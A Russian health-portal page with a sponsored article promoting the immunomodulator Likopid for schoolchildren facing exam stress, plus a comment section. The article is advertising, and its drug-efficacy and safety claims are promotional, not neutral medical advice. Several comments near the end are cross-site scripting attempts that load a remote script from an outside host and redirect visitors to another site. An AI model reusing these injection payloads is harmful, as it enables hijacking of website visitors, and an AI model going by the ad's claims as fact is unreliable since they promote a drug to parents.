Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ликопид на защите иммунит...  >>  Ликопид на защите иммунитета против экзаменационных стрессов!
 
Обратная связь
 

Ликопид на защите иммунитета против экзаменационных стрессов!

Размер шрифта
27 мая 2015 00:00
  • google_analytics: false
  • Нравится

Заканчивается очередной учебный год, наступает волнительное время последних звонков и выпускных экзаменов. Многие школы практикуют экзаменационные испытания не только по окончании школы, но и переводные экзамены в период обучения в средней школе. Поэтому сегодня у гораздо большего количества учеников  разного возраста и их родителей появляется повод для волнений.

Ликопид на защите иммунитета против экзаменационных стрессов!

Подготовка и сдача экзаменов  это напряжённый период в жизни каждого школьника. К концу учебного года  все уже порядком устали и дети, и родители, и сами учителя. Поэтому в этот непростой период так важно не поддаваться паническим настроениям, снизить степень предэкзаменационной тревоги у  ребёнка и не давить на него.

Волнение перед экзаменами вполне  понятно и естественно, в малых дозах оно помогает мобилизовать внутренние силы организма. Так, по утверждению  психологов, небольшой стресс  стимулирует деятельность мозга и повышает познавательную активность. Доказано, что боящиеся экзамена ученики могут заметно улучшить свои достижения и даже превзойти тех, кто экзаменов не боится. Главное, чтобы это волнение не было чрезмерным и не превращалось в панику, а позволяло добиваться наилучшего результата.

В целом стресс – нормальная реакция организма на сложную ситуацию, он мобилизует мышление, память, внимание. Однако чрезмерное напряжение ребенку ни к чему.  Порой в одиночку школьнику очень сложно с ним справиться, не оставляйте его наедине со своим волнением. Переутомление в совокупности со стрессом  и  неправильным режимом сна, учёбы и отдыха может пошатнуть иммунитет  и вполне здорового ребёнка, не говоря уже о часто болеющих детях.

Внимательный родитель поможет ребенку справиться со стрессом перед экзаменом. Ребёнку важно ощутить родительскую любовь, поддержку и не думать о возможных  неудачах. Для этого необходимо вместе с ребенком планировать работу по подготовке к экзаменам, правильно распределив нагрузку. Врачи  рекомендуют учащимся воздерживаться от приема успокоительных средств перед экзаменом, чтобы не вызвать торможение активности головного мозга.

Лучшая профилактика  тревожных состояний, что у детей, что у родителей - хорошее самочувствие, залог которого -  уверенность в себе, своём здоровье, а также здоровье близких. Стресс способен снижать иммунитет в момент особенных переживаний и оказывать  пагубное влияние  на иммунную систему человека в последующие периоды, поэтому для  нормальной работы иммунной системы и профилактики иммунодефицитных состояний лучше всего использовать достижения современной иммунотерапии.

Ликопид 1 мг препарат российского производства. Его  действующее вещество со сложным название глюкозаминилмурамилдипептид было синтезировано в лабораториях  отечественного  института биоорганической химии имени академиков М.М. Шемякина и Ю.А. Овчинникова в 1995 году. И  вот уже 20 лет, пройдя все клинические испытания и доказав свою эффективность, он  применяется  для профилактики и  комплексного  лечения заболеваний, сопровождающихся вторичным иммунодефицитом.

Спектр заболеваний, связанных с вторичным иммунодефицитом очень широк: это острые  и хронические инфекции верхних и нижних дыхательных путей; острые и хронические гнойно-воспалительные заболевания кожи и мягких тканей; герпетические инфекции и многие другие заболевания, вызываемые вирусами, микробами и бактериями. Противостоять им может только нормально функционирующая иммунная система. Факторов, которые пагубно влияют на иммунную систему достаточно много. Наряду со стрессом это может быть неправильное питание, недостаток сна, переутомление, как умственное, так и физическое и многое другое.

Благодаря тому, что механизм действия препарата Ликопид 1 мг тщательно изучен, мы знаем, что  его действие максимально приближено к процессу естественной иммунорегуляции, реализуемой в организме под действием патогенных бактерий.  Именно поэтому Ликопид 1 мг имеет высокий уровень безопасности и хорошо переносится и взрослыми и детьми.

Иммунная система, как и другие системы организма, активно развивается в процессе роста ребёнка. Она не программируется при рождении человека. Каждый ребёнок рождается с   клетками иммунной системы, которые  будут развиваться, а как – это  сильно зависит от раннего окружения и воспитания. Дефицит  иммунитета в детстве опасен тем, что дети, регулярно испытывающие стресс, вырастают во взрослых с ослабленной иммунной системой.

Поэтому,  какова бы ни была оценка за экзамен, не позволяйте себе критиковать или упрекать ребенка. Намного дороже и важнее всех оценок - здоровье отношения в семье.  Педагоги и психологи рекомендуют чаще хвалить детей. Атмосфера любви в доме даёт ребёнку чувство защищённости, а это является  залогом  его  успеха в школе и в жизни.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - genafirst12

27 мая 2015 в 16:55

Комментарий удален за нарушение Правил общения

2 - genafirst12

27 мая 2015 в 17:26

Комментарий удален за нарушение Правил общения

3 - Гость

28 мая 2015 в 23:04

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:07

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Виды закаливания. Как закаливать детей, чтобы уберечь от простуды, какой в этом смысл   Мойка посуды убивает детей   Магниты убивают детей! Как их защитить?   Когда вы нервничаете, ваш ребенок толстеет  
24 мая 2013Ученые сошли сума! Они доказали, что компьютерные игры стимулируют чтение! 10 декабря 2012Синий свет спасет от стресса
 
05 декабря 2012Когда вы нервничаете, ваш ребенок толстеет 26 ноября 2012Бесчувственный язык – причина ожирения
 

Слайдшоу

1
Как кормить грудью
Первые шаги вашего малыша
Детские болезни, которые должна знать каждая мама. Часть 2

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Заболеет ли ваша семья?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.